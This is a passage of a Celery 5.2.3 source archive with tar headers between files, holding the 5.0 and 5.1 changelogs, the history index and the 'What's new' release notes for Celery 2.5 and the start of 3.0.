Kabui** - **Dash Winterson** - **Shanavas M** - **Brett Randall** - **Przemysław Suliga** - **Joshua Schmid** - **Asif Saif Uddin** - **Xiaodong** - **Vikas Prasad** - **Jamie Alessio** - **Lars Kruse** - **Guilherme Caminha** - **Andrea Rabbaglietti** - **Itay Bittan** - **Noah Hall** - **Peng Weikang** - **Mariatta Wijaya** - **Ed Morley** - **Paweł Adamczak** - **:github_user:`CoffeeExpress`** - **:github_user:`aviadatsnyk`** - **Brian Schrader** - **Josue Balandrano Coronel** - **Tom Clancy** - **Sebastian Wojciechowski** - **Meysam Azad** - **Willem Thiart** - **Charles Chan** - **Omer Katz** - **Milind Shakya** ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/changelog-5.0.rst0000664000175000017500000001312600000000000020312 0ustar00asifasif00000000000000================ Change history ================ This document contains change notes for bugfix & new features in the 5.0.x , please see :ref:`whatsnew-5.0` for an overview of what's new in Celery 5.0. .. _version-5.0.6: 5.0.6 ===== :release-date: 2021-06-28 3.00 P.M UTC+3:00 :release-by: Omer Katz - Inspect commands accept arguments again (#6710). - The :setting:`worker_pool` setting is now respected correctly (#6711). - Ensure AMQPContext exposes an app attribute (#6741). - Exit celery with non zero exit value if failing (#6602). - --quiet flag now actually makes celery avoid producing logs (#6599). - pass_context for handle_preload_options decorator (#6583). - Fix --pool=threads support in command line options parsing (#6787). Fix the behavior of our json serialization which regressed in 5.0 (#6561). - celery -A app events -c camera now works as expected (#6774). .. _version-5.0.5: 5.0.5 ===== :release-date: 2020-12-16 5.35 P.M UTC+2:00 :release-by: Omer Katz - Ensure keys are strings when deleting results from S3 (#6537). - Fix a regression breaking `celery --help` and `celery events` (#6543). .. _version-5.0.4: 5.0.4 ===== :release-date: 2020-12-08 2.40 P.M UTC+2:00 :release-by: Omer Katz - DummyClient of cache+memory:// backend now shares state between threads (#6524). This fixes a problem when using our pytest integration with the in memory result backend. Because the state wasn't shared between threads, #6416 results in test suites hanging on `result.get()`. .. _version-5.0.3: 5.0.3 ===== :release-date: 2020-12-03 6.30 P.M UTC+2:00 :release-by: Omer Katz - Make `--workdir` eager for early handling (#6457). - When using the MongoDB backend, don't cleanup if result_expires is 0 or None (#6462). - Fix passing queues into purge command (#6469). - Restore `app.start()` and `app.worker_main()` (#6481). - Detaching no longer creates an extra log file (#6426). - Result backend instances are now thread local to ensure thread safety (#6416). - Don't upgrade click to 8.x since click-repl doesn't support it yet. - Restore preload options (#6516). .. _version-5.0.2: 5.0.2 ===== :release-date: 2020-11-02 8.00 P.M UTC+2:00 :release-by: Omer Katz - Fix _autodiscover_tasks_from_fixups (#6424). - Flush worker prints, notably the banner (#6432). - **Breaking Change**: Remove `ha_policy` from queue definition. (#6440) This argument has no effect since RabbitMQ 3.0. Therefore, We feel comfortable dropping it in a patch release. - Python 3.9 support (#6418). - **Regression**: When using the prefork pool, pick the fair scheduling strategy by default (#6447). - Preserve callbacks when replacing a task with a chain (#6189). 
- Fix max_retries override on `self.retry()` (#6436). - Raise proper error when replacing with an empty chain (#6452) .. _version-5.0.1: 5.0.1 ===== :release-date: 2020-10-18 1.00 P.M UTC+3:00 :release-by: Omer Katz - Specify UTF-8 as the encoding for log files (#6357). - Custom headers now propagate when using the protocol 1 hybrid messages (#6374). - Retry creating the database schema for the database results backend in case of a race condition (#6298). - When using the Redis results backend, awaiting for a chord no longer hangs when setting :setting:`result_expires` to 0 (#6373). - When a user tries to specify the app as an option for the subcommand, a custom error message is displayed (#6363). - Fix the `--without-gossip`, `--without-mingle`, and `--without-heartbeat` options which now work as expected. (#6365) - Provide a clearer error message when the application cannot be loaded. - Avoid printing deprecation warnings for settings when they are loaded from Django settings (#6385). - Allow lowercase log levels for the `--loglevel` option (#6388). - Detaching now works as expected (#6401). - Restore broadcasting messages from `celery control` (#6400). - Pass back real result for single task chains (#6411). - Ensure group tasks a deeply serialized (#6342). - Fix chord element counting (#6354). - Restore the `celery shell` command (#6421). .. _version-5.0.0: 5.0.0 ===== :release-date: 2020-09-24 6.00 P.M UTC+3:00 :release-by: Omer Katz - **Breaking Change** Remove AMQP result backend (#6360). - Warn when deprecated settings are used (#6353). - Expose retry_policy for Redis result backend (#6330). - Prepare Celery to support the yet to be released Python 3.9 (#6328). 5.0.0rc3 ======== :release-date: 2020-09-07 4.00 P.M UTC+3:00 :release-by: Omer Katz - More cleanups of leftover Python 2 support (#6338). 5.0.0rc2 ======== :release-date: 2020-09-01 6.30 P.M UTC+3:00 :release-by: Omer Katz - Bump minimum required eventlet version to 0.26.1. - Update Couchbase Result backend to use SDK V3. - Restore monkeypatching when gevent or eventlet are used. 5.0.0rc1 ======== :release-date: 2020-08-24 9.00 P.M UTC+3:00 :release-by: Omer Katz - Allow to opt out of ordered group results when using the Redis result backend (#6290). - **Breaking Change** Remove the deprecated celery.utils.encoding module. 5.0.0b1 ======= :release-date: 2020-08-19 8.30 P.M UTC+3:00 :release-by: Omer Katz - **Breaking Change** Drop support for the Riak result backend (#5686). - **Breaking Change** pytest plugin is no longer enabled by default (#6288). Install pytest-celery to enable it. - **Breaking Change** Brand new CLI based on Click (#5718). 5.0.0a2 ======= :release-date: 2020-08-05 7.15 P.M UTC+3:00 :release-by: Omer Katz - Bump Kombu version to 5.0 (#5686). 5.0.0a1 ======= :release-date: 2020-08-02 9.30 P.M UTC+3:00 :release-by: Omer Katz - Removed most of the compatibility code that supports Python 2 (#5686). - Modernized code to work on Python 3.6 and above (#5686). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/changelog-5.1.rst0000664000175000017500000001272400000000000020316 0ustar00asifasif00000000000000.. _changelog: ================ Change history ================ This document contains change notes for bugfix & new features in the & 5.1.x series, please see :ref:`whatsnew-5.1` for an overview of what's new in Celery 5.1. .. 
version-5.1.2: 5.1.2 ===== :release-date: 2021-06-28 16.15 P.M UTC+3:00 :release-by: Omer Katz - When chords fail, correctly call errbacks. (#6814) We had a special case for calling errbacks when a chord failed which assumed they were old style. This change ensures that we call the proper errback dispatch method which understands new and old style errbacks, and adds test to confirm that things behave as one might expect now. - Avoid using the ``Event.isSet()`` deprecated alias. (#6824) - Reintroduce sys.argv default behaviour for ``Celery.start()``. (#6825) .. version-5.1.1: 5.1.1 ===== :release-date: 2021-06-17 16.10 P.M UTC+3:00 :release-by: Omer Katz - Fix ``--pool=threads`` support in command line options parsing. (#6787) - Fix ``LoggingProxy.write()`` return type. (#6791) - Couchdb key is now always coerced into a string. (#6781) - grp is no longer imported unconditionally. (#6804) This fixes a regression in 5.1.0 when running Celery in non-unix systems. - Ensure regen utility class gets marked as done when concertised. (#6789) - Preserve call/errbacks of replaced tasks. (#6770) - Use single-lookahead for regen consumption. (#6799) - Revoked tasks are no longer incorrectly marked as retried. (#6812, #6816) .. version-5.1.0: 5.1.0 ===== :release-date: 2021-05-23 19.20 P.M UTC+3:00 :release-by: Omer Katz - ``celery -A app events -c camera`` now works as expected. (#6774) - Bump minimum required Kombu version to 5.1.0. .. _version-5.1.0rc1: 5.1.0rc1 ======== :release-date: 2021-05-02 16.06 P.M UTC+3:00 :release-by: Omer Katz - Celery Mailbox accept and serializer parameters are initialized from configuration. (#6757) - Error propagation and errback calling for group-like signatures now works as expected. (#6746) - Fix sanitization of passwords in sentinel URIs. (#6765) - Add LOG_RECEIVED to customize logging. (#6758) .. _version-5.1.0b2: 5.1.0b2 ======= :release-date: 2021-05-02 16.06 P.M UTC+3:00 :release-by: Omer Katz - Fix the behavior of our json serialization which regressed in 5.0. (#6561) - Add support for SQLAlchemy 1.4. (#6709) - Safeguard against schedule entry without kwargs. (#6619) - ``task.apply_async(ignore_result=True)`` now avoids persisting the results. (#6713) - Update systemd tmpfiles path. (#6688) - Ensure AMQPContext exposes an app attribute. (#6741) - Inspect commands accept arguments again (#6710). - Chord counting of group children is now accurate. (#6733) - Add a setting :setting:`worker_cancel_long_running_tasks_on_connection_loss` to terminate tasks with late acknowledgement on connection loss. (#6654) - The ``task-revoked`` event and the ``task_revoked`` signal are not duplicated when ``Request.on_failure`` is called. (#6654) - Restore pickling support for ``Retry``. (#6748) - Add support in the redis result backend for authenticating with a username. (#6750) - The :setting:`worker_pool` setting is now respected correctly. (#6711) .. _version-5.1.0b1: 5.1.0b1 ======= :release-date: 2021-04-02 10.25 P.M UTC+6:00 :release-by: Asif Saif Uddin - Add sentinel_kwargs to Redis Sentinel docs. - Depend on the maintained python-consul2 library. (#6544). - Use result_chord_join_timeout instead of hardcoded default value. - Upgrade AzureBlockBlob storage backend to use Azure blob storage library v12 (#6580). - Improved integration tests. - pass_context for handle_preload_options decorator (#6583). - Makes regen less greedy (#6589). - Pytest worker shutdown timeout (#6588). - Exit celery with non zero exit value if failing (#6602). 
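As a rough sketch of how a few of the 5.1 additions listed above fit together (the app and task names here are hypothetical), the Redis result backend can now authenticate with a username, late-acknowledging tasks can be cancelled on connection loss, and individual calls can skip persisting their result:

.. code-block:: python

    from celery import Celery

    app = Celery('proj', broker='redis://localhost:6379/0')

    # 5.1: the Redis result backend accepts a username (Redis 6 ACLs).
    app.conf.result_backend = 'redis://reporting:secret@localhost:6379/1'

    # 5.1: terminate tasks with late acknowledgement if the broker
    # connection is lost.
    app.conf.worker_cancel_long_running_tasks_on_connection_loss = True


    @app.task(acks_late=True)
    def add(x, y):
        return x + y


    # 5.1: skip persisting the result for this particular invocation.
    add.apply_async((2, 2), ignore_result=True)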
- Raise BackendStoreError when set value is too large for Redis. - Trace task optimizations are now set via Celery app instance. - Make trace_task_ret and fast_trace_task public. - reset_worker_optimizations and create_request_cls has now app as optional parameter. - Small refactor in exception handling of on_failure (#6633). - Fix for issue #5030 "Celery Result backend on Windows OS". - Add store_eager_result setting so eager tasks can store result on the result backend (#6614). - Allow heartbeats to be sent in tests (#6632). - Fixed default visibility timeout note in sqs documentation. - Support Redis Sentinel with SSL. - Simulate more exhaustive delivery info in apply(). - Start chord header tasks as soon as possible (#6576). - Forward shadow option for retried tasks (#6655). - --quiet flag now actually makes celery avoid producing logs (#6599). - Update platforms.py "superuser privileges" check (#6600). - Remove unused property `autoregister` from the Task class (#6624). - fnmatch.translate() already translates globs for us. (#6668). - Upgrade some syntax to Python 3.6+. - Add `azureblockblob_base_path` config (#6669). - Fix checking expiration of X.509 certificates (#6678). - Drop the lzma extra. - Fix JSON decoding errors when using MongoDB as backend (#6675). - Allow configuration of RedisBackend's health_check_interval (#6666). - Safeguard against schedule entry without kwargs (#6619). - Docs only - SQS broker - add STS support (#6693) through kombu. - Drop fun_accepts_kwargs backport. - Tasks can now have required kwargs at any order (#6699). - Min py-amqp 5.0.6. - min billiard is now 3.6.4.0. - Minimum kombu now is5.1.0b1. - Numerous docs fixes. - Moved CI to github action. - Updated deployment scripts. - Updated docker. - Initial support of python 3.9 added. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/index.rst0000664000175000017500000000124300000000000017167 0ustar00asifasif00000000000000.. _history: ========= History ========= This section contains historical change histories, for the latest version please visit :ref:`changelog`. :Release: |version| :Date: |today| .. toctree:: :maxdepth: 2 whatsnew-5.1 changelog-5.1 whatsnew-5.0 changelog-5.0 whatsnew-4.4 changelog-4.4 whatsnew-4.3 changelog-4.3 whatsnew-4.2 changelog-4.2 whatsnew-4.1 changelog-4.1 whatsnew-4.0 changelog-4.0 whatsnew-3.1 changelog-3.1 whatsnew-3.0 changelog-3.0 whatsnew-2.5 changelog-2.5 changelog-2.4 changelog-2.3 changelog-2.2 changelog-2.1 changelog-2.0 changelog-1.0 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/history/whatsnew-2.5.rst0000664000175000017500000003723200000000000020231 0ustar00asifasif00000000000000.. _whatsnew-2.5: ========================== What's new in Celery 2.5 ========================== Celery aims to be a flexible and reliable, best-of-breed solution to process vast amounts of messages in a distributed fashion, while providing operations with the tools to maintain such a system. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should visit our `website`_. While this version is backward compatible with previous versions it's important that you read the following section. 
If you use Celery in combination with Django you must also read the `django-celery changelog ` and upgrade to :pypi:`django-celery 2.5 `. This version is officially supported on CPython 2.5, 2.6, 2.7, 3.2 and 3.3, as well as PyPy and Jython. .. _`website`: http://celeryproject.org/ .. contents:: :local: .. _v250-important: Important Notes =============== Broker connection pool now enabled by default --------------------------------------------- The default limit is 10 connections, if you have many threads/green-threads using connections at the same time you may want to tweak this limit to avoid contention. See the :setting:`BROKER_POOL_LIMIT` setting for more information. Also note that publishing tasks will be retried by default, to change this default or the default retry policy see :setting:`CELERY_TASK_PUBLISH_RETRY` and :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY`. Rabbit Result Backend: Exchange is no longer *auto delete* ---------------------------------------------------------- The exchange used for results in the Rabbit (AMQP) result backend used to have the *auto_delete* flag set, which could result in a race condition leading to an annoying warning. .. admonition:: For RabbitMQ users Old exchanges created with the *auto_delete* flag enabled has to be removed. The :program:`camqadm` command can be used to delete the previous exchange: .. code-block:: console $ camqadm exchange.delete celeryresults As an alternative to deleting the old exchange you can configure a new name for the exchange:: CELERY_RESULT_EXCHANGE = 'celeryresults2' But you have to make sure that all clients and workers use this new setting, so they're updated to use the same exchange name. Solution for hanging workers (but must be manually enabled) ----------------------------------------------------------- The `CELERYD_FORCE_EXECV` setting has been added to solve a problem with deadlocks that originate when threads and fork is mixed together: .. code-block:: python CELERYD_FORCE_EXECV = True This setting is recommended for all users using the prefork pool, but especially users also using time limits or a max tasks per child setting. - See `Python Issue 6721`_ to read more about this issue, and why resorting to :func:`~os.execv`` is the only safe solution. Enabling this option will result in a slight performance penalty when new child worker processes are started, and it will also increase memory usage (but many platforms are optimized, so the impact may be minimal). Considering that it ensures reliability when replacing lost worker processes, it should be worth it. - It's already the default behavior on Windows. - It will be the default behavior for all platforms in a future version. .. _`Python Issue 6721`: http://bugs.python.org/issue6721#msg140215 .. _v250-optimizations: Optimization ============ - The code path used when the worker executes a task has been heavily optimized, meaning the worker is able to process a great deal more tasks/second compared to previous versions. As an example the solo pool can now process up to 15000 tasks/second on a 4 core MacBook Pro when using the :pypi:`pylibrabbitmq` transport, where it previously could only do 5000 tasks/second. - The task error tracebacks are now much shorter. - Fixed a noticeable delay in task processing when rate limits are enabled. .. 
_v250-deprecations: Deprecation Time-line Changes ============================= Removals -------- * The old :class:`TaskSet` signature of ``(task_name, list_of_tasks)`` can no longer be used (originally scheduled for removal in 2.4). The deprecated ``.task_name`` and ``.task`` attributes has also been removed. * The functions ``celery.execute.delay_task``, ``celery.execute.apply``, and ``celery.execute.apply_async`` has been removed (originally) scheduled for removal in 2.3). * The built-in ``ping`` task has been removed (originally scheduled for removal in 2.3). Please use the ping broadcast command instead. * It's no longer possible to import ``subtask`` and ``TaskSet`` from :mod:`celery.task.base`, please import them from :mod:`celery.task` instead (originally scheduled for removal in 2.4). Deprecated modules ------------------ * The :mod:`celery.decorators` module has changed status from pending deprecation to deprecated, and is scheduled for removal in version 4.0. The ``celery.task`` module must be used instead. .. _v250-news: News ==== Timezone support ---------------- Celery can now be configured to treat all incoming and outgoing dates as UTC, and the local timezone can be configured. This isn't yet enabled by default, since enabling time zone support means workers running versions pre-2.5 will be out of sync with upgraded workers. To enable UTC you have to set :setting:`CELERY_ENABLE_UTC`:: CELERY_ENABLE_UTC = True When UTC is enabled, dates and times in task messages will be converted to UTC, and then converted back to the local timezone when received by a worker. You can change the local timezone using the :setting:`CELERY_TIMEZONE` setting. Installing the :pypi:`pytz` library is recommended when using a custom timezone, to keep timezone definition up-to-date, but it will fallback to a system definition of the timezone if available. UTC will enabled by default in version 3.0. .. note:: :pypi:`django-celery` will use the local timezone as specified by the ``TIME_ZONE`` setting, it will also honor the new `USE_TZ`_ setting introduced in Django 1.4. .. _`USE_TZ`: https://docs.djangoproject.com/en/dev/topics/i18n/timezones/ New security serializer using cryptographic signing --------------------------------------------------- A new serializer has been added that signs and verifies the signature of messages. The name of the new serializer is ``auth``, and needs additional configuration to work (see :ref:`conf-security`). .. seealso:: :ref:`guide-security` Contributed by Mher Movsisyan. New :setting:`CELERY_ANNOTATIONS` setting ----------------------------------------- This new setting enables the configuration to modify task classes and their attributes. The setting can be a dict, or a list of annotation objects that filter for tasks and return a map of attributes to change. As an example, this is an annotation to change the ``rate_limit`` attribute for the ``tasks.add`` task: .. code-block:: python CELERY_ANNOTATIONS = {'tasks.add': {'rate_limit': '10/s'}} or change the same for all tasks: .. code-block:: python CELERY_ANNOTATIONS = {'*': {'rate_limit': '10/s'}} You can change methods too, for example the ``on_failure`` handler: .. code-block:: python def my_on_failure(self, exc, task_id, args, kwargs, einfo): print('Oh no! Task failed: %r' % (exc,)) CELERY_ANNOTATIONS = {'*': {'on_failure': my_on_failure}} If you need more flexibility then you can also create objects that filter for tasks to annotate: .. 
code-block:: python class MyAnnotate(object): def annotate(self, task): if task.name.startswith('tasks.'): return {'rate_limit': '10/s'} CELERY_ANNOTATIONS = (MyAnnotate(), {other_annotations,}) ``current`` provides the currently executing task ------------------------------------------------- The new :data:`celery.task.current` proxy will always give the currently executing task. **Example**: .. code-block:: python from celery.task import current, task @task def update_twitter_status(auth, message): twitter = Twitter(auth) try: twitter.update_status(message) except twitter.FailWhale, exc: # retry in 10 seconds. current.retry(countdown=10, exc=exc) Previously you'd've to type ``update_twitter_status.retry(…)`` here, which can be annoying for long task names. .. note:: This won't work if the task function is called directly (i.e., ``update_twitter_status(a, b)``). For that to work ``apply`` must be used: ``update_twitter_status.apply((a, b))``. In Other News ------------- - Now depends on Kombu 2.1.0. - Efficient Chord support for the Memcached backend (Issue #533) This means Memcached joins Redis in the ability to do non-polling chords. Contributed by Dan McGee. - Adds Chord support for the Rabbit result backend (amqp) The Rabbit result backend can now use the fallback chord solution. - Sending :sig:`QUIT` to ``celeryd`` will now cause it cold terminate. That is, it won't finish executing the tasks it's currently working on. Contributed by Alec Clowes. - New "detailed" mode for the Cassandra backend. Allows to have a "detailed" mode for the Cassandra backend. Basically the idea is to keep all states using Cassandra wide columns. New states are then appended to the row as new columns, the last state being the last column. See the :setting:`CASSANDRA_DETAILED_MODE` setting. Contributed by Steeve Morin. - The Crontab parser now matches Vixie Cron behavior when parsing ranges with steps (e.g., 1-59/2). Contributed by Daniel Hepper. - ``celerybeat`` can now be configured on the command-line like ``celeryd``. Additional configuration must be added at the end of the argument list followed by ``--``, for example: .. code-block:: console $ celerybeat -l info -- celerybeat.max_loop_interval=10.0 - Now limits the number of frames in a traceback so that ``celeryd`` doesn't crash on maximum recursion limit exceeded exceptions (Issue #615). The limit is set to the current recursion limit divided by 8 (which is 125 by default). To get or set the current recursion limit use :func:`sys.getrecursionlimit` and :func:`sys.setrecursionlimit`. - More information is now preserved in the pickleable traceback. This has been added so that Sentry can show more details. Contributed by Sean O'Connor. - CentOS init-script has been updated and should be more flexible. Contributed by Andrew McFague. - MongoDB result backend now supports ``forget()``. Contributed by Andrew McFague - ``task.retry()`` now re-raises the original exception keeping the original stack trace. Suggested by :github_user:`ojii`. - The `--uid` argument to daemons now uses ``initgroups()`` to set groups to all the groups the user is a member of. Contributed by Łukasz Oleś. - ``celeryctl``: Added ``shell`` command. The shell will have the current_app (``celery``) and all tasks automatically added to locals. - ``celeryctl``: Added ``migrate`` command. The migrate command moves all tasks from one broker to another. Note that this is experimental and you should have a backup of the data before proceeding. **Examples**: .. 
code-block:: console $ celeryctl migrate redis://localhost amqp://localhost $ celeryctl migrate amqp://localhost//v1 amqp://localhost//v2 $ python manage.py celeryctl migrate django:// redis:// * Routers can now override the ``exchange`` and ``routing_key`` used to create missing queues (Issue #577). By default this will always use the name of the queue, but you can now have a router return exchange and routing_key keys to set them. This is useful when using routing classes which decides a destination at run-time. Contributed by Akira Matsuzaki. - Redis result backend: Adds support for a ``max_connections`` parameter. It's now possible to configure the maximum number of simultaneous connections in the Redis connection pool used for results. The default max connections setting can be configured using the :setting:`CELERY_REDIS_MAX_CONNECTIONS` setting, or it can be changed individually by ``RedisBackend(max_connections=int)``. Contributed by Steeve Morin. - Redis result backend: Adds the ability to wait for results without polling. Contributed by Steeve Morin. - MongoDB result backend: Now supports save and restore ``taskset``. Contributed by Julien Poissonnier. - There's a new :ref:`guide-security` guide in the documentation. - The init-scripts have been updated, and many bugs fixed. Contributed by Chris Streeter. - User (tilde) is now expanded in command-line arguments. - Can now configure :envvar:`CELERYCTL` environment variable in :file:`/etc/default/celeryd`. While not necessary for operation, :program:`celeryctl` is used for the ``celeryd status`` command, and the path to :program:`celeryctl` must be configured for that to work. The daemonization cookbook contains examples. Contributed by Jude Nagurney. - The MongoDB result backend can now use Replica Sets. Contributed by Ivan Metzlar. - gevent: Now supports autoscaling (Issue #599). Contributed by Mark Lavin. - multiprocessing: Mediator thread is now always enabled, even though rate limits are disabled, as the pool semaphore is known to block the main thread, causing broadcast commands and shutdown to depend on the semaphore being released. Fixes ===== - Exceptions that are re-raised with a new exception object now keeps the original stack trace. - Windows: Fixed the ``no handlers found for multiprocessing`` warning. - Windows: The ``celeryd`` program can now be used. Previously Windows users had to launch ``celeryd`` using ``python -m celery.bin.celeryd``. - Redis result backend: Now uses ``SETEX`` command to set result key, and expiry atomically. Suggested by :github_user:`yaniv-aknin`. - ``celeryd``: Fixed a problem where shutdown hanged when :kbd:`Control-c` was used to terminate. - ``celeryd``: No longer crashes when channel errors occur. Fix contributed by Roger Hu. - Fixed memory leak in the eventlet pool, caused by the use of ``greenlet.getcurrent``. Fix contributed by Ignas Mikalajūnas. - Cassandra backend: No longer uses :func:`pycassa.connect` which is deprecated since :pypi:`pycassa` 1.4. Fix contributed by Jeff Terrace. - Fixed unicode decode errors that could occur while sending error emails. Fix contributed by Seong Wun Mun. - ``celery.bin`` programs now always defines ``__package__`` as recommended by PEP-366. - ``send_task`` now emits a warning when used in combination with :setting:`CELERY_ALWAYS_EAGER` (Issue #581). Contributed by Mher Movsisyan. - ``apply_async`` now forwards the original keyword arguments to ``apply`` when :setting:`CELERY_ALWAYS_EAGER` is enabled. 
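To illustrate the ``max_connections`` option for the Redis result backend mentioned in the news items above, a 2.5-era configuration module might look like the following sketch; only the last line is the new option, the rest is an assumed minimal setup of that time:

.. code-block:: python

    # celeryconfig.py -- illustrative only, using the old-style setting names.
    CELERY_RESULT_BACKEND = 'redis'

    # New in 2.5: cap the number of simultaneous connections in the
    # Redis result backend's connection pool.
    CELERY_REDIS_MAX_CONNECTIONS = 10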
- ``celeryev`` now tries to re-establish the connection if the connection to the broker is lost (Issue #574). - ``celeryev``: Fixed a crash occurring if a task has no associated worker information. Fix contributed by Matt Williamson. - The current date and time is now consistently taken from the current loaders ``now`` method. - Now shows helpful error message when given a configuration module ending in ``.py`` that can't be imported. - ``celeryctl``: The :option:`--expires ` and :option:`--eta ` arguments to the apply command can now be an ISO-8601 formatted string. - ``celeryctl`` now exits with exit status ``EX_UNAVAILABLE`` (69) if no replies have been received. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/docs/history/whatsnew-3.0.rst0000664000175000017500000007425400000000000020232 0ustar00asifasif00000000000000.. _whatsnew-3.0: =========================================== What's new in Celery 3.0 (Chiastic Slide) =========================================== Celery is a simple, flexible, and reliable distributed system to process vast amounts of messages, while providing operations with the tools required to maintain such a system. It's a task queue with focus on real-time processing, while also supporting task scheduling. Celery has a large and diverse community of users and contributors, you should come join us :ref:`on IRC ` or :ref:`our mailing-list `. To read more about Celery you should go read the :ref:`introduction `. While this version is backward compatible with previous versions it's important that you read the following section. If you use Celery in combination with Django you must also read the `django-celery changelog`_ and upgrade to :pypi:`django-celery 3.0 `. This version is officially supported on CPython 2.5, 2.6, 2.7, 3.2 and 3.3, as well as PyPy and Jython. Highlights ========== .. topic:: Overview - A new and improved API, that's both simpler and more powerful. Everyone must read the new :ref:`first-steps` tutorial, and the new :ref:`next-steps` tutorial. Oh, and why not reread the user guide while you're at it :) There are no current plans to deprecate the old API, so you don't have to be in a hurry to port your applications. - The worker is now thread-less, giving great performance improvements. - The new "Canvas" makes it easy to define complex work-flows. Ever wanted to chain tasks together? This is possible, but not just that, now you can even chain together groups and chords, or even combine multiple chains. Read more in the :ref:`Canvas ` user guide. - All of Celery's command-line programs are now available from a single :program:`celery` umbrella command. - This is the last version to support Python 2.5. Starting with Celery 3.1, Python 2.6 or later is required. - Support for the new :pypi:`librabbitmq` C client. Celery will automatically use the :pypi:`librabbitmq` module if installed, which is a very fast and memory-optimized replacement for the :pypi:`amqp` module. - Redis support is more reliable with improved ack emulation. - Celery now always uses UTC - Over 600 commits, 30k additions/36k deletions. In comparison 1.0➝ 2.0 had 18k additions/8k deletions. .. _`website`: http://celeryproject.org/ .. _`django-celery changelog`: https://github.com/celery/django-celery/tree/master/Changelog .. contents:: :local: :depth: 2 .. 
_v300-important: Important Notes =============== Broadcast exchanges renamed --------------------------- The workers remote control command exchanges has been renamed (a new :term:`pidbox` name), this is because the ``auto_delete`` flag on the exchanges has been removed, and that makes it incompatible with earlier versions. You can manually delete the old exchanges if you want, using the :program:`celery amqp` command (previously called ``camqadm``): .. code-block:: console $ celery amqp exchange.delete celeryd.pidbox $ celery amqp exchange.delete reply.celeryd.pidbox Event-loop ---------- The worker is now running *without threads* when used with RabbitMQ (AMQP), or Redis as a broker, resulting in: - Much better overall performance. - Fixes several edge case race conditions. - Sub-millisecond timer precision. - Faster shutdown times. The transports supported are: ``py-amqp`` ``librabbitmq``, ``redis``, and ``amqplib``. Hopefully this can be extended to include additional broker transports in the future. For increased reliability the :setting:`CELERY_FORCE_EXECV` setting is enabled by default if the event-loop isn't used. New ``celery`` umbrella command ------------------------------- All Celery's command-line programs are now available from a single :program:`celery` umbrella command. You can see a list of sub-commands and options by running: .. code-block:: console $ celery help Commands include: - ``celery worker`` (previously ``celeryd``). - ``celery beat`` (previously ``celerybeat``). - ``celery amqp`` (previously ``camqadm``). The old programs are still available (``celeryd``, ``celerybeat``, etc), but you're discouraged from using them. Now depends on :pypi:`billiard` ------------------------------- Billiard is a fork of the multiprocessing containing the no-execv patch by ``sbt`` (http://bugs.python.org/issue8713), and also contains the pool improvements previously located in Celery. This fork was necessary as changes to the C extension code was required for the no-execv patch to work. - Issue #625 - Issue #627 - Issue #640 - `django-celery #122 >> from celery import chain # (2 + 2) * 8 / 2 >>> res = chain(add.subtask((2, 2)), mul.subtask((8,)), div.subtask((2,))).apply_async() >>> res.get() == 16 >>> res.parent.get() == 32 >>> res.parent.parent.get() == 4 - Adds :meth:`AsyncResult.get_leaf` Waits and returns the result of the leaf subtask. That's the last node found when traversing the graph, but this means that the graph can be 1-dimensional only (in effect a list). - Adds ``subtask.link(subtask)`` + ``subtask.link_error(subtask)`` Shortcut to ``s.options.setdefault('link', []).append(subtask)`` - Adds ``subtask.flatten_links()`` Returns a flattened list of all dependencies (recursively) Redis: Priority support ----------------------- The message's ``priority`` field is now respected by the Redis transport by having multiple lists for each named queue. The queues are then consumed by in order of priority. The priority field is a number in the range of 0 - 9, where 0 is the default and highest priority. The priority range is collapsed into four steps by default, since it is unlikely that nine steps will yield more benefit than using four steps. The number of steps can be configured by setting the ``priority_steps`` transport option, which must be a list of numbers in **sorted order**: .. code-block:: pycon >>> BROKER_TRANSPORT_OPTIONS = { ... 'priority_steps': [0, 2, 4, 6, 8, 9], ... 
} Priorities implemented in this way isn't as reliable as priorities on the server side, which is why the feature is nicknamed "quasi-priorities"; **Using routing is still the suggested way of ensuring quality of service**, as client implemented priorities fall short in a number of ways, for example if the worker is busy with long running tasks, has prefetched many messages, or the queues are congested. Still, it is possible that using priorities in combination with routing can be more beneficial than using routing or priorities alone. Experimentation and monitoring should be used to prove this. Contributed by Germán M. Bravo. Redis: Now cycles queues so that consuming is fair -------------------------------------------------- This ensures that a very busy queue won't block messages from other queues, and ensures that all queues have an equal chance of being consumed from. This used to be the case before, but the behavior was accidentally changed while switching to using blocking pop. `group`/`chord`/`chain` are now subtasks ---------------------------------------- - group is no longer an alias to ``TaskSet``, but new all together, since it was very difficult to migrate the ``TaskSet`` class to become a subtask. - A new shortcut has been added to tasks: .. code-block:: pycon >>> task.s(arg1, arg2, kw=1) as a shortcut to: .. code-block:: pycon >>> task.subtask((arg1, arg2), {'kw': 1}) - Tasks can be chained by using the ``|`` operator: .. code-block:: pycon >>> (add.s(2, 2), pow.s(2)).apply_async() - Subtasks can be "evaluated" using the ``~`` operator: .. code-block:: pycon >>> ~add.s(2, 2) 4 >>> ~(add.s(2, 2) | pow.s(2)) is the same as: .. code-block:: pycon >>> chain(add.s(2, 2), pow.s(2)).apply_async().get() - A new subtask_type key has been added to the subtask dictionary. This can be the string ``"chord"``, ``"group"``, ``"chain"``, ``"chunks"``, ``"xmap"``, or ``"xstarmap"``. - maybe_subtask now uses subtask_type to reconstruct the object, to be used when using non-pickle serializers. - The logic for these operations have been moved to dedicated tasks celery.chord, celery.chain and celery.group. - subtask no longer inherits from AttributeDict. It's now a pure dict subclass with properties for attribute access to the relevant keys. - The repr's now outputs how the sequence would like imperatively: .. code-block:: pycon >>> from celery import chord >>> (chord([add.s(i, i) for i in xrange(10)], xsum.s()) | pow.s(2)) tasks.xsum([tasks.add(0, 0), tasks.add(1, 1), tasks.add(2, 2), tasks.add(3, 3), tasks.add(4, 4), tasks.add(5, 5), tasks.add(6, 6), tasks.add(7, 7), tasks.add(8, 8), tasks.add(9, 9)]) | tasks.pow(2) New remote control commands --------------------------- These commands were previously experimental, but they've proven stable and is now documented as part of the official API. - 